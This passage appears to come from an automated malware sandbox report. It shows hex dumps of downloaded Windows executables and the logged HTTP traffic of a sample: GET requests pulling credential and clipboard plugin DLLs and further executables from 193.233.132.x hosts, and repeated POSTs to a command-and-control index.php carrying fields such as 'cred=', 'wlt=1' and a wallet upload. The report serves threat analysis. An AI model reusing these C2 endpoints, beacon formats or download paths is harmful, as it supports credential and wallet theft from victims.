b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b6 2a 19 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 c0 03 00 00 00 00 00 00 90 58 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 58 00 00 04 00 00 3b 36 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 5a 58 00 4c 00 00 00 5e 80 14 00 72 00 00 00 00 50 14 00 58 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 58 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 59 58 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 2b 00 00 00 50 14 00 00 0c 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 14 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 90 14 00 00 02 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6c 7a 6e 64 67 7a 71 00 30 19 00 00 60 3f 00 00 26 19 00 00 5e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6d 6e 6b 6e 69 66 6c 00 10 00 00 00 90 58 00 00 04 00 00 00 84 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:19 GMTContent-Type: application/octet-streamContent-Length: 1876480Last-Modified: Sat, 13 Apr 2024 16:50:51 GMTConnection: keep-aliveETag: "661ab7eb-1ca200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2a 52 e4 13 6e 33 8a 40 6e 33 8a 40 6e 33 8a 40 35 5b 89 41 60 33 8a 40 35 5b 8f 41 f0 33 8a 40 bb 5e 8e 41 7c 33 8a 40 bb 5e 89 41 7a 33 8a 40 bb 5e 8f 41 1b 33 8a 40 35 5b 8e 41 7a 33 8a 40 35 5b 8b 41 7d 33 8a 40 6e 33 8b 40 ba 33 8a 40 f5 5d 83 41 6f 33 8a 40 f5 5d 75 40 6f 33 8a 40 f5 5d 88 41 6f 33 8a 40 52 69 63 68 6e 33 8a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 b2 bf 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 aa 01 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4a 00 00 04 00 00 78 24 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 06 00 6a 00 00 00 00 60 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 6d 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 6d 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 60 06 00 00 02 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 72 68 77 6d 63 6d 6c 00 b0 19 00 00 c0 30 00 00 b0 19 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 62 74 69 77 74 79 64 00 10 00 00 00 70 4a 00 00 06 00 00 00 9c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:26 GMTContent-Type: application/octet-streamContent-Length: 1050444Last-Modified: Sat, 13 Apr 2024 18:20:05 GMTConnection: keep-aliveETag: "661accd5-10074c"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b7 b7 1a 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1c 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 50 0c 12 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 7c 61 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 61 04 00 00 40 0d 00 00 62 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 56 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:22:06 GMTContent-Type: application/octet-streamContent-Length: 1793536Last-Modified: Sat, 06 Apr 2024 12:58:33 GMTConnection: keep-aliveETag: "661146f9-1b5e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 94 ab f9 65 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 54 1b 00 00 08 00 00 00 00 00 00 4e 72 1b 00 00 20 00 00 00 80 1b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 1b 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 72 1b 00 4b 00 00 00 00 80 1b 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 1b 00 0c 00 00 00 b7 71 1b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 52 1b 00 00 20 00 00 00 54 1b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 44 05 00 00 00 80 1b 00 00 06 00 00 00 56 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 1b 00 00 02 00 00 00 5c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 72 1b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 77 01 00 78 08 01 00 03 00 02 00 10 00 00 06 24 80 02 00 ef 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 6a 00 00 00 01 00 00 11 7e 01 00 00 04 3a 5f 00 00 00 17 80 01 00 00 04 7e af 00 00 04 28 fe 02 00 06 20 e8 07 00 00 20 03 00 00 00 20 13 00 00 00 73 0f 00 00 0a 7e b0 00 00 04 28 02 03 00 06 fe 0e 00 00 fe 0d 00 00 7e b1 00 00 04 28 06 03 00 06 7e b2 00 00 04 28 0a 03 00 06 20 0e 00 00 00 3f 0b 00 00 00 72 01 00 00 70 73 10 00 00 0a 7a 2a 00 00 1a 28 01 00 00 06 2a 00 13 30 04 00 24 00 00 00 02 00 00 11 16 0a 72 ea 00 00 70 03 8c 0d 00 00 01 7e b3 00 00 04 28 0e 03 00 06 7e b4 00 00 04 28 12 03 00 06 0a 06 2a 12 03 04 5d 2a 00 00 00 1b 30 06 00 0e 03 00 00 03 00 00 11 14 13 11 14 13 12 73 09 00 00 06 13 13 11 13 02 7d 04 00 00 04 0e 04 8e 69 0a 14 0c 14 0d 20 00 01 00 00 8d 1c 00 00 01 0c 20 00 01 00 00 8d 1c 00 00 01 0d dd 06 00 00 00 26 dd 00 00 00 00 11 13 16 7d 03 00 00 04 38 0c 01 00 00 11 13 7b 03 00 00 04 13 04 1f 64 13 05 02 11 04 7e b5 00 00 04 28 16 03 00 06 13 05 08 11 05 8c 1c 00 00 01 11 13 7b 03 00 00 04 7e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000042001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYxMA==Host: 193.233.132.56Content-Length: 4770Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 34 33 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000043031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000049001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 30 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000051001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
